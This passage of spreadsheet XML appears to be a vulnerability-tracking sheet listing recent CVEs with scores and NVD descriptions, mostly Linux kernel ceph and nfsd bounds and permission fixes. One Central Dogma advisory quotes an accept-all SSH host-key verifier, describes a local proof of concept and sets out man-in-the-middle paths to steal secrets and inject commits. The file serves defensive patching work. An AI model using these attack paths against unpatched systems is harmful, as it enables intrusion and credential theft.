      <c r="M142" s="5" t="inlineStr"/>
      <c r="N142" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O142" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P142" s="5" t="inlineStr"/>
      <c r="Q142" s="5" t="inlineStr"/>
      <c r="R142" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: fix ALIGN() overflow in symlink_data() error context loop
The check added by commit 7d9a7f1f96cd ("smb/client: fix possible
infinite loop and oob read in symlink_data()") compared the post-ALIGN
length against the remaining buffer, but ALIGN() itself can overflow:
for ErrorDataLength near UINT32_MAX (e.g. 0xFFFFFFF9), ALIGN(x, 8)
wraps to 0, so the subsequent bounds check passes, and the loop
advances by zero bytes leaving 'p' pointing into stale data.
Fix by checking the raw ErrorDataLength against the remaining space
before applying ALIGN(), then checking again after.  Since raw_len is
bounded by the buffer, raw_len + 7 cannot overflow, so the second check
is an exact post-alignment bounds guard.</t>
        </is>
      </c>
      <c r="S142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89634</t>
        </is>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B143" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89649</t>
        </is>
      </c>
      <c r="D143" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E143" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F143" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G143" s="5" t="inlineStr"/>
      <c r="H143" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I143" s="5" t="inlineStr"/>
      <c r="J143" s="5" t="inlineStr"/>
      <c r="K143" s="5" t="inlineStr"/>
      <c r="L143" s="5" t="inlineStr"/>
      <c r="M143" s="5" t="inlineStr"/>
      <c r="N143" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O143" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P143" s="5" t="inlineStr"/>
      <c r="Q143" s="5" t="inlineStr"/>
      <c r="R143" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ceph: bound xattr value length in __build_xattrs()
__build_xattrs() decodes the MDS-supplied xattr blob one attribute at a
time. For each attribute it reads a 32-bit name length, advances past the
name bytes, reads a 32-bit value length, records the value pointer, and
advances past the value bytes. The two length fields are read with
ceph_decode_32_safe(), but the value bytes themselves are advanced over
with a bare "p += len" and no ceph_decode_need() check that "len" bytes
remain in the blob.
For every attribute except the last, the next iteration's
ceph_decode_32_safe() on the following name length implicitly verifies
that the previous value did not run past the blob end. The final
attribute has no successor, so its decoded value length is never checked
against the blob bounds. A malicious or compromised metadata server can
set the last attribute's value length larger than the bytes actually
present in the blob.
The blob is a dedicated kvmalloc() allocation sized to the wire length
(ceph_buffer_new() in ceph_fill_inode()). __set_xattr() records the
oversized length in xattr-&gt;val_len verbatim, and a later getxattr(2) runs
memcpy(value, xattr-&gt;val, xattr-&gt;val_len) into a user-supplied buffer,
copying bytes past the end of the allocation back to user space.
Impact: a malicious metadata server discloses adjacent kernel heap bytes
to a local user via getxattr(2) on a CephFS file. Add the missing
ceph_decode_need() so an out-of-bounds value length on the final
attribute fails the decode and returns -EIO instead of being stored.</t>
        </is>
      </c>
      <c r="S143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89649</t>
        </is>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B144" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89650</t>
        </is>
      </c>
      <c r="D144" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E144" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F144" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G144" s="5" t="inlineStr"/>
      <c r="H144" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I144" s="5" t="inlineStr"/>
      <c r="J144" s="5" t="inlineStr"/>
      <c r="K144" s="5" t="inlineStr"/>
      <c r="L144" s="5" t="inlineStr"/>
      <c r="M144" s="5" t="inlineStr"/>
      <c r="N144" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O144" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P144" s="5" t="inlineStr"/>
      <c r="Q144" s="5" t="inlineStr"/>
      <c r="R144" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ceph: bound num_export_targets array for mds info v2/v3
ceph_mdsmap_decode() in fs/ceph/mdsmap.c reads num_export_targets from
each per-mds info record and advances the decode cursor by
num_export_targets * sizeof(u32) without first checking that many bytes
remain. The only upper-bound check that catches a runaway cursor
(*p &gt; info_end) is gated on info_v &gt;= 4, because info_end is left NULL
for info_v 2 and 3. When the monitor sends an MDS map whose per-mds
info version is 2 or 3 with an oversized num_export_targets, the cursor
moves past the message front buffer and the later export-targets loop
calls the unchecked ceph_decode_32() on out-of-bounds memory.
A kernel client processes CEPH_MSG_MDS_MAP from its monitor session
(net/ceph/mon_client.c dispatches it; fs/ceph/super.c routes it to
ceph_mdsc_handle_mdsmap(), which sets end to the front buffer bound and
calls ceph_mdsmap_decode()). A malicious or compromised monitor, or an
on-path attacker on an unsigned/unencrypted messenger session, can
therefore drive an out-of-bounds read in the client kernel; on x86_64
with KASAN it is reported as a slab-out-of-bounds read in
ceph_mdsmap_decode(). The decoded values land in the internal
info-&gt;export_targets[] array, so the consequence is a kernel
out-of-bounds read, not an information leak to the attacker.
Impact: a malicious or compromised Ceph monitor sending an MDS map with
a per-mds info version of 2 or 3 and an oversized num_export_targets
field triggers an out-of-bounds read in the CephFS client kernel.
Add a ceph_decode_need() for the export-targets array before advancing
the cursor, so the bound is enforced for every info_v &gt;= 2, not only
info_v &gt;= 4. This mirrors the count-then-need idiom already used for
m_data_pg_pools later in the same function.
Compute the export-targets byte count with size_mul() and reuse that
checked length when advancing the cursor, so the attacker-controlled
num_export_targets multiplication fails closed on overflow rather than
relying on the later kcalloc() guard.</t>
        </is>
      </c>
      <c r="S144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89650</t>
        </is>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B145" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89671</t>
        </is>
      </c>
      <c r="D145" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E145" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F145" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G145" s="5" t="inlineStr"/>
      <c r="H145" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I145" s="5" t="inlineStr"/>
      <c r="J145" s="5" t="inlineStr"/>
      <c r="K145" s="5" t="inlineStr"/>
      <c r="L145" s="5" t="inlineStr"/>
      <c r="M145" s="5" t="inlineStr"/>
      <c r="N145" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O145" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P145" s="5" t="inlineStr"/>
      <c r="Q145" s="5" t="inlineStr"/>
      <c r="R145" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: gate nfs3 setacl by argp-&gt;mask
nfsd3_proc_setacl() calls set_posix_acl() unconditionally for both
ACL_TYPE_ACCESS and ACL_TYPE_DEFAULT, passing argp-&gt;acl_access and
argp-&gt;acl_default verbatim. The NFSv3 ACL decoder only populates
those pointers when the corresponding mask bit is set:
    nfs3svc_decode_setaclargs()
      if (args-&gt;mask &amp; NFS_ACL)    decode into acl_access
      if (args-&gt;mask &amp; NFS_DFACL)  decode into acl_default
      /* otherwise the pointer stays NULL (pc_argzero) */
    nfsd3_proc_setacl()
      set_posix_acl(.., ACL_TYPE_ACCESS,  argp-&gt;acl_access)
      set_posix_acl(.., ACL_TYPE_DEFAULT, argp-&gt;acl_default)
set_posix_acl(idmap, dentry, type, NULL) is the VFS "remove this
ACL type" operation. A NULL pointer that means "the client did not
send this arm" is therefore indistinguishable from "the client
asked to remove this ACL". A SETACL with mask=NFS_ACL silently
drops the directory's default ACL; mask=0 drops both.
The sibling nfsd3_proc_getacl() already consults argp-&gt;mask before
touching each arm; mirror that in setacl.
Fix by wrapping each set_posix_acl() call in the matching mask bit
check and initializing error to 0 before inode_lock so that a
request with neither bit set leaves the on-disk ACLs untouched and
returns nfs_ok. The out_drop_lock path and the unconditional
posix_acl_release() at out: are preserved; both NULL-tolerate the
skipped arms.</t>
        </is>
      </c>
      <c r="S145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89671</t>
        </is>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B146" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89672</t>
        </is>
      </c>
      <c r="D146" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E146" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F146" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G146" s="5" t="inlineStr"/>
      <c r="H146" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I146" s="5" t="inlineStr"/>
      <c r="J146" s="5" t="inlineStr"/>
      <c r="K146" s="5" t="inlineStr"/>
      <c r="L146" s="5" t="inlineStr"/>
      <c r="M146" s="5" t="inlineStr"/>
      <c r="N146" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O146" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P146" s="5" t="inlineStr"/>
      <c r="Q146" s="5" t="inlineStr"/>
      <c r="R146" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: gate nfs2 setacl by argp-&gt;mask
The NFSACL v2 SETACL path shares the decoder convention used by its
v3 sibling: nfsaclsvc_decode_setaclargs() fills in argp-&gt;acl_access
only when NFS_ACL is set in the request mask and argp-&gt;acl_default
only when NFS_DFACL is set, leaving the other pointer NULL because
the argument buffer is zeroed up to pc_argzero before decode.
nfsacld_proc_setacl() then hands both pointers to set_posix_acl()
unconditionally. set_posix_acl(idmap, dentry, type, NULL) is the VFS
"remove this ACL type" operation, so an omitted arm is
indistinguishable from an explicit request to delete that ACL. A
SETACL carrying only NFS_ACL silently strips the directory's default
ACL; mask=0 strips both.
This is the same defect just fixed in nfsd3_proc_setacl(); apply the
same remedy. Gate each set_posix_acl() call on its mask bit and
initialize error to 0 so that a request with neither bit set leaves
the on-disk ACLs untouched and returns success. The out_drop_lock
path and the unconditional posix_acl_release() in
nfsaclsvc_release_setacl() already tolerate the skipped arms.</t>
        </is>
      </c>
      <c r="S146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89672</t>
        </is>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B147" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89697</t>
        </is>
      </c>
      <c r="D147" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E147" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F147" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G147" s="5" t="inlineStr"/>
      <c r="H147" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I147" s="5" t="inlineStr"/>
      <c r="J147" s="5" t="inlineStr"/>
      <c r="K147" s="5" t="inlineStr"/>
      <c r="L147" s="5" t="inlineStr"/>
      <c r="M147" s="5" t="inlineStr"/>
      <c r="N147" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O147" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P147" s="5" t="inlineStr"/>
      <c r="Q147" s="5" t="inlineStr"/>
      <c r="R147" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: add fh_want_write() for early-verified SETATTR in nfsd_proc_setattr()
The BOTH_TIME_SET branch calls fh_verify() early so setattr_prepare()
can inspect the dentry. This causes nfsd_setattr() to skip
fh_want_write(), so notify_change() runs without a mount write
reference.
Add the missing fh_want_write() call after the early fh_verify().</t>
        </is>
      </c>
      <c r="S147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89697</t>
        </is>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B148" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89713</t>
        </is>
      </c>
      <c r="D148" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E148" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F148" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G148" s="5" t="inlineStr"/>
      <c r="H148" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I148" s="5" t="inlineStr"/>
      <c r="J148" s="5" t="inlineStr"/>
      <c r="K148" s="5" t="inlineStr"/>
      <c r="L148" s="5" t="inlineStr"/>
      <c r="M148" s="5" t="inlineStr"/>
      <c r="N148" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O148" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P148" s="5" t="inlineStr"/>
      <c r="Q148" s="5" t="inlineStr"/>
      <c r="R148" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFSD: check truncate permission under inode lock
nfsd_setattr() checks whether a size update needs NFSD_MAY_TRUNC
before it takes inode_lock(). The comparison uses the file size sampled
by that unlocked read, but the actual ATTR_SIZE update is applied later
under inode_lock() by notify_change().
This leaves a TOCTOU window for append-only files. If a client sends a
SETATTR that does not shrink the file at the time of the unlocked
sample, a concurrent append can extend the file before nfsd_setattr()
takes inode_lock(). notify_change() then applies a real truncation
without the NFSD_MAY_TRUNC check that rejects IS_APPEND(inode). The VFS
truncate syscall paths perform their own append-only checks before
calling notify_change(), so NFSD must make this decision against the
locked size it is about to change.
Split the write-count acquisition from the truncation permission check.
Keep get_write_access() before the locked setattr work, then recheck
whether the requested size is below i_size_read(inode) after inode_lock()
has been acquired and before notify_change(ATTR_SIZE). This also avoids
the plain unlocked inode-&gt;i_size load.</t>
        </is>
      </c>
      <c r="S148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89713</t>
        </is>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B149" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69854</t>
        </is>
      </c>
      <c r="D149" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E149" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F149" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G149" s="5" t="inlineStr"/>
      <c r="H149" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I149" s="5" t="inlineStr"/>
      <c r="J149" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="K149" s="5" t="inlineStr"/>
      <c r="L149" s="5" t="inlineStr"/>
      <c r="M149" s="5" t="inlineStr"/>
      <c r="N149" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O149" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P149" s="5" t="inlineStr"/>
      <c r="Q149" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R149" s="5" t="inlineStr">
        <is>
          <t>Improper authentication in Spring Cloud Azure allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69854</t>
        </is>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B150" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11745</t>
        </is>
      </c>
      <c r="D150" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E150" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F150" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G150" s="5" t="inlineStr"/>
      <c r="H150" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I150" s="5" t="inlineStr"/>
      <c r="J150" s="5" t="inlineStr"/>
      <c r="K150" s="5" t="inlineStr"/>
      <c r="L150" s="5" t="inlineStr">
        <is>
          <t>maven:com.linecorp.centraldogma:centraldogma-server-mirror-git</t>
        </is>
      </c>
      <c r="M150" s="5" t="inlineStr">
        <is>
          <t>0.84.0</t>
        </is>
      </c>
      <c r="N150" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O150" s="5" t="inlineStr"/>
      <c r="P150" s="5" t="inlineStr"/>
      <c r="Q150" s="5" t="inlineStr">
        <is>
          <t>CWE-322</t>
        </is>
      </c>
      <c r="R150" s="5" t="inlineStr">
        <is>
          <t># Vulnerability
Central Dogma's Git mirror SSH client installs an Apache MINA SSHD `ServerKeyVerifier` lambda that returns `true` unconditionally for every outbound SSH connection used by `git+ssh://` mirrors. The accompanying lines disable the `known_hosts` and `~/.ssh/config` fallbacks, and a repo-wide search confirms that no host-key pinning mechanism (no `acceptedHostKeys`, `knownHosts`, `KnownHostsServerKeyVerifier`, `StaticServerKeyVerifier`, or `RequiredServerKeyVerifier`) exists anywhere in `server-mirror-git/`. Operators have no opt-in way to enable verification. Every outbound mirror connection blindly trusts whatever host key the remote presents.
## Evidence
File: `server-mirror-git/src/main/java/com/linecorp/centraldogma/server/internal/mirror/SshGitMirror.java`
Lines 143-160 (especially 149) on branch `main` @ commit `d64a5151`:
```java
private SshClient createSshClient() {
    final ClientBuilder builder = ClientBuilder.builder();
    // Do not use local file system.
    builder.hostConfigEntryResolver(HostConfigEntryResolver.EMPTY);   // line 146
    builder.fileSystemFactory(NoneFileSystemFactory.INSTANCE);        // line 147
    // Do not verify the server key.
    builder.serverKeyVerifier((clientSession, remoteAddress, serverKey) -&gt; true);  // line 149
    ...
}
```
Verification:
- Read confirmed on 2026-05-21 against `main` @ `d64a5151`.
- A multi-agent code audit verified that no operator-facing pinning field exists on `SshKeyCredential`, `PasswordCredential`, or `MirrorContext`.
- Exploit PoC reproduced locally with a `paramiko`-based fake SSH server bound to 127.0.0.1. The fake server presents an ephemeral RSA host key never seen before; the Central Dogma mirror client accepts the connection and proceeds to authentication, logging the offered username and public-key fingerprint. A correctly hardened SSH client would refuse the connection before reaching the authentication phase.
- Full PoC artifacts (read-only, loopback-only) at `~/centraldogma-poc/C1_ssh_hostkey_bypass/` on the reporter's workstation.
## Impact
Threat model: An on-path attacker on the corporate network — ARP spoofing on the LAN, internal DNS poisoning, malicious internal DNS overriding `github.com` or the configured internal git hostname, BGP hijack, sidecar/CNI compromise in Kubernetes, or any process able to answer TCP on the resolved IP. No Central Dogma account required; only network position.
1. **Direction `LOCAL_TO_REMOTE`**: the attacker impersonating the remote git server receives the entire mirrored repository contents over the SSH session. Central Dogma is a configuration store, so this typically exfiltrates DB credentials, third-party API keys, certificates, feature flags, and any other secret configuration committed to mirrored repositories.
2. **Direction `REMOTE_TO_LOCAL`**: the attacker can serve arbitrary commits which Central Dogma materializes into the local repo and then broadcasts to every subscribing microservice via the watch API. This is a supply-chain root-of-trust compromise across all downstream services consuming Central Dogma configuration.
3. **Credential theft chain with finding H2** (mirror credentials are not bound to a hostname): an SSH key or access token configured for `github.com` can be captured by the attacker's fake server and replayed against the real upstream, extending impact beyond Central Dogma itself.
Scope is `Changed` (CVSS) because exploitation alters trust assumptions of every downstream client of Central Dogma, not just Central Dogma itself.
## How to fix
1. Add an `acceptedHostKeys: List&lt;String&gt;` field to `SshKeyCredential` and `PasswordCredential` (or to `MirrorContext`). Values are SHA-256 fingerprints of trusted remote SSH server host keys, e.g. `SHA256:nThbg6kXUpJWGl7E1IGOCspRomTxdCARLviKw6E5SY8`.
2. Replace the accept-all lambda at `SshGitMirror.java:149` with a verifier that computes the SHA-256 fingerprint of the presented host key and compares it against the credential's allowlist using a constant-time comparison.
3. Refuse to connect when `acceptedHostKeys` is empty — fail-closed. Do not implement implicit TOFU.
4. Optionally provide an admin-only `dogma mirror probe-host-key &lt;remote&gt;` tool that performs a single audited connection, prints the server's fingerprint, and prompts the operator to add it to the credential. This makes TOFU an explicit, audited operation.
5. Update `SshGitMirrorTest.java` and `it/mirror/*` tests to pin a test fingerprint or use the explicit trust-once tool, so the regression cannot silently return.</t>
        </is>
      </c>
      <c r="S150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11745</t>
        </is>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B151" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12894</t>
        </is>
      </c>
      <c r="D151" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E151" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F151" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G151" s="5" t="inlineStr"/>
      <c r="H151" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I151" s="5" t="inlineStr"/>
      <c r="J151" s="5" t="inlineStr"/>
      <c r="K151" s="5" t="inlineStr"/>
      <c r="L151" s="5" t="inlineStr"/>
      <c r="M151" s="5" t="inlineStr"/>
      <c r="N151" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O151" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P151" s="5" t="inlineStr"/>
      <c r="Q151" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="R151" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the Qute template engine, which is used by Quarkus to generate dynamic content like HTML pages or emails. The issue exists in the component responsible for looking up data values (ReflectionValueResolver), which fails to properly block access to sensitive Java internal functions when processing certain data types like Enums. An attacker who can provide or influence the template text can exploit this bypass to take control of the server by executing unauthorized commands.</t>
        </is>
      </c>
      <c r="S151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12894</t>
        </is>
      </c>
    </row>
    <row r="152">
      <c r="A152" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B152" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21094</t>
        </is>
      </c>
      <c r="D152" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E152" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F152" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G152" s="5" t="inlineStr"/>
      <c r="H152" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I152" s="5" t="inlineStr"/>
      <c r="J152" s="5" t="inlineStr"/>
      <c r="K152" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L152" s="5" t="inlineStr"/>
      <c r="M152" s="5" t="inlineStr"/>
      <c r="N152" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O152" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P152" s="5" t="inlineStr"/>
      <c r="Q152" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R152" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in wpa_supplicant prior to SMR Sep-2026 Release 1 allows adjacent attackers to write out-of-bounds memory.</t>
        </is>
      </c>
      <c r="S152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21094</t>
        </is>
      </c>
    </row>
    <row r="153">
      <c r="A153" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B153" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41870</t>
        </is>
      </c>
      <c r="D153" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E153" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F153" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G153" s="5" t="inlineStr"/>
      <c r="H153" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I153" s="5" t="inlineStr"/>
      <c r="J153" s="5" t="inlineStr"/>
      <c r="K153" s="5" t="inlineStr">
        <is>
          <t>apache:nutch</t>
        </is>
      </c>
      <c r="L153" s="5" t="inlineStr"/>
      <c r="M153" s="5" t="inlineStr"/>
      <c r="N153" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O153" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P153" s="5" t="inlineStr"/>
      <c r="Q153" s="5" t="inlineStr">
        <is>
          <t>CWE-470, CWE-862, CWE-913, CWE-94</t>
        </is>
      </c>
      <c r="R153" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization, Improper Control of Generation of Code ('Code Injection'), Improper Control of Dynamically-Managed Code Resources, Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection') vulnerability in Apache Nutch Server  (Nutch REST API).
This issue affects Apache Nutch: from 1.11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S153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41870</t>
        </is>
      </c>
    </row>
    <row r="154">
      <c r="A154" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B154" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62102</t>
        </is>
      </c>
      <c r="D154" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E154" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F154" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G154" s="5" t="inlineStr"/>
      <c r="H154" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I154" s="5" t="inlineStr"/>
      <c r="J154" s="5" t="inlineStr"/>
      <c r="K154" s="5" t="inlineStr"/>
      <c r="L154" s="5" t="inlineStr"/>
      <c r="M154" s="5" t="inlineStr"/>
      <c r="N154" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O154" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P154" s="5" t="inlineStr"/>
      <c r="Q154" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
